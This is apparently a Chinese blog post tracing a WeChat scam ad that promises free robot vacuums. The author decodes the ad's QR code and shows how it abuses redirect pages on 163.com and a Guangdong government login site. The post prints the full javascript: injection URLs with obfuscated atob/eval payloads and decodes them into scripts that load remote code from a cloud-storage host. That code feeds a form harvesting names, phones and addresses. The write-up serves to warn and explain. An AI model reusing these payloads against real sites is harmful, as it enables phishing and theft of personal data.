前两天在朋友圈突然看到有发 小米新店开业 送千台扫地机器人的 广告,出于天上不会掉馅饼到我身上的原则 我选择忽略了,但是没多久 看到他又晒了个物流订单,于是还是点开看了一下,发现微信打开的网站还蛮正规的,但是又不是小米的域名,于是我留了个心眼,填了个假地址和电话,然后同样也生成了物流单消息。于是准备来看看到底是真是假。
首先朋友圈的广告是这样的
然后我把图片的二维码发给电脑版微信,电脑版微信扫码后直接 直接打开了腾讯官网,这个时候我就确定看到是那个网站被挂马了,于是就解码了下二维码 发现地址是这样的:
https://shequn.wenwen.163.com/launch.html?url=jav ascr
ipt:a=\u0061\u0074\u006f\u0062`aW1wb3J0KCcvL3VjYnQub3NzLWFjY2VsZXJhdGUuYWxpeXVuY3MuY29tL3gvMTYzX3JrJyk=`;\u0065\u0076\u0061\u006c(a)
分析了一下 居然是一个 base64的js脚本,像是通过个人的163博客做为基本跳转的 脚本也很简单
(function(url) { if (url) { location.href = url } })(getQuery('url')) function getQuery(name) { var reg = new RegExp("(^|&)" + name + "=([^&]*)(&|$)"); var r = window.location.search.substr(1).match(reg); if (r != null) return unescape(r[2]); return null; }
通过base64 解码 js 代码 是 :import('//ucbt.oss-accelerate.aliyuncs.com/x/163_rk')
才发现他居然是通过阿里云的oss 做具体脚本跳转的
下载代码后 发现还有几层跳转
最后跳到了 广东政务服务网 广东省统一身份认证平台 https://tyrz.gd.gov.cn,
最后的跳转地址是:https://tyrz.gd.gov.cn/pscp/sso/static/countrytransfer?src=javas%09cript%3Aa%3D%5Cu0061%5Cu0074%5Cu006f%5Cu0062%60ZG9jdW1lbnQuYm9keS5oaWRkZW49dHJ1ZTtkb2N1bWVudC50aXRsZT0nJzt2PWRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpO3Yuc3JjPSIvL3VjYnQub3NzLWFjY2VsZXJhdGUuYWxpeXVuY3MuY29tL3gvZ2Rndl9sZCI7ZG9jdW1lbnQuaGVhZC5hcHBlbmRDaGlsZCh2KTt0aHJvdyAw%60%3B%5Cu0065%5Cu0076%5Cu0061%5Cu006c%28a%29%2F%2F&xkey=52&bhufjr
解析这段js 的内容是
document.body.hidden=true;document.title='';v=document.createElement('script');v.src="//ucbt.oss-accelerate.aliyuncs.com/x/gdgv_ld";document.head.appendChild(v);
跳转到了真正界面
//ucbt.oss-accelerate.aliyuncs.com/x/gdgv_ld
然后他通过 让你填写手机号 地址等信息 进行个人信息收集,最后提交到了一个网站:https://dxjyxq.com/admin/token/saveAddress_2/?name=1111&tel=15388880000®ion=%E7%A6%8F%E5%BB%BA+%2F+%E5%AE%81%E5%BE%B7+%2F+%E9%9C%9E%E6%B5%A6%E5%8E%BF&address=111
我开始以为这个网站是没备案的,一查才发现居然是备案的域名
还有他建立了一个qq群,目前qq群人数还在持续增加,目前不太明确具体他收集这些信息是干什么用的 ,但是总的还是那句话 天上不会掉馅饼啊,
整理了一下思路,感觉作者还是很有才华的
首先通过 url 注入的第一段代码来看 他利用加空格、换行符等特殊文本来绕过 注入检测
第二个是 利用 知名网站的 微信js 认证脚本 确保 你在微信里面访问(不仅仅是判断浏览器,而是判断微信js 是否可以出售成功,然后隐藏了分享等按钮)
标签:服务网,cn,url,oss,js,朋友圈,跳转,com From: https://www.cnblogs.com/dotnet-org-cn/p/16704695.html